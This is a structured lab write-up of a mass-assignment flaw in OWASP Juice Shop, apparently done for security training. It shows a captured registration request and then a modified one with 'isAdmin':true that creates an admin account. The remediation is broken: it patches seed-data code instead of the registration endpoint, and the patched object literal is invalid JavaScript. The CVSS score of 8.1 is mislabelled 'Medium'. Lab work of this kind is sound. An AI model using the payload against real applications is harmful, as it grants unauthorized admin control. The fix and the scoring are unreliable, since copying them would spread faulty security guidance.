## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Broken Access Control
  Location:
    / - Error Handling
  CWE:
    CWE-285: Improper Authorization
  Rule:
    REQ.035 Administrar modificaciones de privilegios
  Goal:
    Register an account as admin
  Recommendation:
    Don't let users create admin accounts

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  Dev environment
    Given I see the code at "datacreator.js"
    """
    ...
    73  async function createUsers () {
    74    const users = await loadStaticData('users')
    75
    76    await Promise.all(
    77      users.map(async ({ email, password, customDomain, key, isAdmin, prof
    ileImage }) => {
    78        try {
    79          const completeEmail = customDomain ? email : `${email}@${config.
    get('application.domain')}`
    80          const user = await models.User.create({
    81            email: completeEmail,
    82            password,
    83            isAdmin,
    84            profileImage: profileImage || 'default.svg'
    85          })
    86          datacache.users[key] = user
    87        } catch (err) {
    88          console.error(`Could not insert User ${name}`)
    89          console.error(err)
    90        }
    91      })
    92    )
    93  }
    ...
    """
    Then I see it doesn't creates accounts with the "isAdmin" value from param

  Scenario: Dynamic detection
  Playing with request parameters
    Given I capture a register request with Burp
    """
    POST /api/Users/ HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    Content-Type: application/json
    Content-Length: 245
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=kpWV2ov8DrgwPX7AD4HvhwcEs
    ki3SMuVcBurhDKs3qHjVARQ9lYbyLZqM413; io=-Kkj_3owpoW2hUBLAAAS

    {"email":"p@b.com","password":"kkkkkk","passwordRepeat":"kkkkkk","securityQu
    estion":{"id":2,"question":"Mother's maiden name?","createdAt":"2019-01-31T2
    0:20:25.482Z","updatedAt":"2019-01-31T20:20:25.482Z"},"securityAnswer":"fff"
    }
    """
    Then I get a success response
    """
    HTTP/1.1 201 Created
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Location: /api/Users/18
    Content-Type: application/json; charset=utf-8
    Content-Length: 263
    ETag: W/"107-gRKSajsvQnxEn4VW82zO9NdujLw"
    Date: Thu, 31 Jan 2019 22:11:32 GMT
    Connection: close

    {"status":"success","data":{"username":"","lastLoginIp":"0.0.0.0","profileIm
    age":"default.svg","id":18,"email":"p@b.com","password":"c08ac56ae1145566f2
    ce54cbbea35fa3","isAdmin":false,"updatedAt":"2019-01-31T22:11:32.114Z","crea
    tedAt":"2019-01-31T22:11:32.114Z"}}
    """
    Then I notice the "isAdmin:false" parameter in the response
    And try putting it in a request with a "true" value
    """
    ...
    {"email":"pu@b.com","password":"kkkkkk","passwordRepeat":"kkkkkk", "isAdmin"
    :true,"securityQuestion":{"id":2,"question":"Mother's maiden name?","created
    At":"2019-01-31T20:20:25.482Z","updatedAt":"2019-01-31T20:20:25.482Z"},"secu
    rityAnswer":"fff"}
    """
    Then I get a success response with "isAdmin:true"
    """
    ...
    {"status":"success","data":{"username":"","lastLoginIp":"0.0.0.0","profileIm
    age":"default.svg","id":19,"email":"pu@b.com","password":"c08ac56ae1145566f2
    ce54cbbea35fa3","isAdmin":true,"updatedAt":"2019-01-31T22:13:48.577Z","creat
    edAt":"2019-01-31T22:13:48.577Z"}}
    """
    Then I have an admin account

  Scenario: Exploitation
  Using admin account
    Given I have an admin account
    Then I have full control over the application

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    73  async function createUsers () {
    74    const users = await loadStaticData('users')
    75
    76    await Promise.all(
    77      users.map(async ({ email, password, customDomain, key, profileImage
    }) => {
    78        try {
    79          const completeEmail = customDomain ? email : `${email}@${config.
    get('application.domain')}`
    80          const user = await models.User.create({
    81            email: completeEmail,
    82            password,
    83            false,
    84            profileImage: profileImage || 'default.svg'
    85          })
    86          datacache.users[key] = user
    87        } catch (err) {
    88          console.error(`Could not insert User ${name}`)
    89          console.error(err)
    90        }
    91      })
    92    )
    93  }
    ...
    """
    Then users can't register as admin anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (Medium) - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-31
